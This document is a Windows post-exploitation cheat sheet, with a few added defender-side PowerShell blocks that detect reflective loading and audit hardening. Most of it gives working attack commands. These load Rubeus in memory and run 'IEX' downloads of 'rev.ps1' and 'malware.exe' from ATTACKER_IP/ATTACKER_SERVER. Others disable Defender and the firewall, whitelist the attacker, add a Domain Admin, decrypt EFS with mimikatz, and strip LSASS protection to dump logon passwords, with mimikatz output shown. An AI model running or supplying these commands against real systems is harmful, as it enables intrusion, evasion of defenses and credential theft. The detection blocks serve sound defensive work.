# Miscellaneous

## Reflective Loading

* <https://twitter.com/alh4zr3d/status/1588178898210017280?s=46&t=3M009y9X9MgpQbkce8qjmw>

```powershell
# Fetch the assembly bytes, load them straight from memory and call its entry point
$d = (New-Object System.Net.WebClient).DownloadData('http://<ip>/Rubeus.exe')
$a = [System.Reflection.Assembly]::Load($d)
[Rubeus.Program]::Main("triage".Split())
```
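As an added, defender-side example (not part of the original notes), the following PowerShell hunts Script Block Logging events (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) for the DownloadData / Assembly.Load pattern shown above. It assumes Script Block Logging is enabled and that it runs with rights to read that log; the regular expression is a constructed, deliberately narrow pattern that you would widen for your own environment.

```powershell
# Added example, not from the original notes: hunt PowerShell Script Block Logging
# (Event ID 4104) for in-memory assembly loading like the snippet above.
# Assumes Script Block Logging is enabled and the Operational log is readable.
function Find-ReflectiveLoadEvents {
    param(
        [int]$Hours = 24,
        # Constructed pattern: bytes pulled over HTTP and handed to Assembly.Load
        [string]$Pattern = '\[(System\.)?Reflection\.Assembly\]::Load\(|\.DownloadData\('
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match $Pattern } |
        ForEach-Object {
            # 4104 message layout: "Creating Scriptblock text (n of m):", the script text, "ScriptBlock ID: ..."
            $lines = $_.Message -split "`r?`n"
            $hit   = $lines | Where-Object { $_ -match $Pattern } | Select-Object -First 1
            [pscustomobject]@{
                Time     = $_.TimeCreated
                Sid      = $_.UserId
                RecordId = $_.RecordId
                Snippet  = if ($hit) { $hit.Trim() } else { '' }
            }
        }
}

Find-ReflectiveLoadEvents -Hours 72 | Format-Table -AutoSize
```

Each row points back to the script block that triggered, so the full text can be pulled with `Get-WinEvent` by RecordId when triaging; without Script Block Logging enabled the function simply returns nothing.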

## Windows Defender

```powershell
# Stop the Defender service
sc.exe stop WinDefend

# Disable real-time monitoring
Set-MpPreference -DisableRealtimeMonitoring $true

# Remove definitions (the path contains spaces, so PowerShell needs the call operator)
& "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```

## Firewall

```powershell
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
```

## IP Whitelisting

```powershell
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
```

## Changing Permissions of a file

```powershell
icacls text.txt /grant Everyone:F
```

## Downloading files

```powershell
# Download and run a script in memory
IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")

# Download to disk
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"

# Built-in alternative
certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe
```

## Adding user to Domain admins

```powershell
# PowerView cmdlet
Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose
```

## Base64 Encode-Decode

```powershell
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64
```

## Network sharing

Local shares

```powershell
net share
wmic share get /format:list
```

Remote shares

```powershell
net view
net view \\dc.ecorp.foo /all
wmic /node:dc.ecorp.foo share get
```

Mounting a share

```powershell
net use Z: \\127.0.0.1\C$ /user:morph3 password123
```

Hosting a local SMB server (on the attacking host)

```bash
impacket-smbserver -smb2support morph3-share .
```

## Port Forwarding

```powershell
# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080

# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56
```

## Powershell Portscan

```powershell
# Connect() throws on closed ports; the error is discarded so only open ports are printed
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("VICTIM_IP",$_)) "Port $_ is open!"} 2>$null
```

## Recovering Powershell Secure String

```powershell
# 1. Build a credential from a SecureString saved to disk (DPAPI-bound to the user and host that saved it)
$user = "morph3"
$file = "morph3-pass.xml"
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication Credssp -ScriptBlock { whoami }

# 2. Recover the plain text of a SecureString through a BSTR ($secureString holds a SecureString object)
[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString))

# 3. Same through CoTaskMem, zeroing the unmanaged copy afterwards ($password holds a SecureString object)
$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result
```
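As an added example (not from the original notes), this writes a SecureString to disk in the format the snippet above reads back, then recovers the plain text while freeing the unmanaged copy. The password is a constructed sample and the file path under `$env:TEMP` is an assumption; the point it demonstrates is that `ConvertFrom-SecureString` without `-Key` wraps the value with DPAPI, so the file only decrypts for the same user on the same machine.

```powershell
# Added example, not from the original notes: save a SecureString the way the
# snippet above expects to read it back, then recover the plain text safely.
# The password is a constructed sample and the file lives under $env:TEMP.

function Save-SecureStringFile {
    param([string]$Path, [securestring]$Secure)
    # Without -Key, ConvertFrom-SecureString protects the value with DPAPI, so the
    # file only converts back under the same user account on the same machine.
    $Secure | ConvertFrom-SecureString | Set-Content -Path $Path
}

function Read-SecureStringFile {
    param([string]$Path)
    # Fails with "Key not valid for use in specified state" when read by another
    # user or on another host; that is the limit of this storage method.
    Get-Content -Path $Path | ConvertTo-SecureString
}

function ConvertTo-PlainText {
    param([securestring]$Secure)
    $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($Secure)
    try {
        [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
    } finally {
        # Zero and free the unmanaged copy so the secret does not linger in process memory
        [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
    }
}

$file   = Join-Path $env:TEMP 'morph3-pass.xml'
$sample = ConvertTo-SecureString 'Example-Passw0rd!' -AsPlainText -Force   # constructed sample
Save-SecureStringFile -Path $file -Secure $sample

$cred  = New-Object System.Management.Automation.PSCredential -ArgumentList 'morph3', (Read-SecureStringFile -Path $file)
$plain = ConvertTo-PlainText -Secure $cred.Password
$plain -eq 'Example-Passw0rd!'   # True when run by the user and host that saved the file
Remove-Item -Path $file
```

`$cred.GetNetworkCredential().Password` gives the same string with less ceremony, but it leaves a managed copy in memory; the BSTR route with `ZeroFreeBSTR` is the one to use when the secret should not outlive the call.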

## Injecting PowerShell scripts Into sessions

```powershell
Invoke-Command -FilePath scriptname -Session $sessions
Enter-PSSession -Session $sess
```

## Enable RDP

In cmd.exe (this disables Network Level Authentication on the RDP listener):

```cmd
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
```

In PowerShell:

```powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

net localgroup "Remote Desktop Users" morph3 /add

# Re-enable the Remote Desktop firewall rule group, or add an explicit rule for 3389
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow
```

## Decrypting EFS files with Mimikatz

The full walkthrough is on the mimikatz wiki: [How to Decrypt EFS Files](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files)

```
# mimikatz: export the user's EFS certificate from the certificate store
privilege::debug
token::elevate
crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export

# mimikatz: inspect the CAPI key container to find which DPAPI master key protects it
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"

# mimikatz: decrypt that master key with the user's clear-text password
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123

# mimikatz: after this command you must have the exported .der and .pvk files
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b

# openssl: rebuild a PFX from the exported certificate and private key
openssl x509 -inform DER -outform PEM -in blah.der -out public.pem
openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

# On the target: import the certificate into the user's store, then the file opens normally
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot

type "C:\Users\Administrator\Documents\encrypted.txt"
```

## Patching LSA

* <https://itm4n.github.io/lsass-runasppl/>

Check whether LSA Protection is enabled:

```
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
```
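As an added, defender-side example (not from the original notes), the following PowerShell reports which of the protections that this page's Windows Defender, Firewall, Enable RDP and Patching LSA commands turn off are currently in place on the local host. It assumes the Defender and NetSecurity PowerShell modules are available (they are on supported Windows client and server builds); the check names are my own labels.

```powershell
# Added example, not from the original notes: report which of the protections
# weakened by the commands on this page (Defender, firewall, RDP/NLA, RunAsPPL)
# are currently in place. Assumes the Defender and NetSecurity modules exist.
function Get-HardeningStatus {
    $mp  = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
    $ts  = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -ErrorAction SilentlyContinue
    $rdp = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -ErrorAction SilentlyContinue

    $checks = @(
        [pscustomobject]@{ Check = 'Defender service WinDefend running';        Ok = ($null -ne $svc -and $svc.Status -eq 'Running') }
        [pscustomobject]@{ Check = 'Defender real-time monitoring enabled';     Ok = ($null -ne $mp -and [bool]$mp.RealTimeProtectionEnabled) }
        # RunAsPPL: 1 = enabled with UEFI lock, 2 = enabled without UEFI lock; absent or 0 = off
        [pscustomobject]@{ Check = 'LSA protection (RunAsPPL) enabled';         Ok = ($null -ne $lsa -and $lsa.RunAsPPL -in 1, 2) }
        [pscustomobject]@{ Check = 'RDP connections denied (fDenyTSConnections)'; Ok = ($null -ne $ts -and $ts.fDenyTSConnections -eq 1) }
        [pscustomobject]@{ Check = 'RDP requires NLA (UserAuthentication)';      Ok = ($null -ne $rdp -and $rdp.UserAuthentication -eq 1) }
    )

    foreach ($profile in (Get-NetFirewallProfile -ErrorAction SilentlyContinue)) {
        $checks += [pscustomobject]@{ Check = "Firewall profile $($profile.Name) enabled"; Ok = ([string]$profile.Enabled -eq 'True') }
    }
    $checks
}

# Every row with Ok = False matches one of the weakening steps on this page
Get-HardeningStatus | Format-Table -AutoSize
```

The RDP row reads as "denied", so a host that legitimately serves RDP will show it as False; the NLA row is the one that matters on such a host, since the `reg add` in the Enable RDP section sets `UserAuthentication` to 0.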

Upload mimikatz and mimidrv.sys and patch it using

```
!+
!processprotect /process:lsass.exe /remove
```

```
c:\Users\administrator\Desktop>.\mimikatz_x64.exe
.\mimikatz_x64.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

ERROR mimikatz_doLocal ; "" command of "standard" module not found !

mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 672 -> 00/00 [0-0-0]

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; ...
Session           : Interactive from 0
User Name         : Administrator

...
```

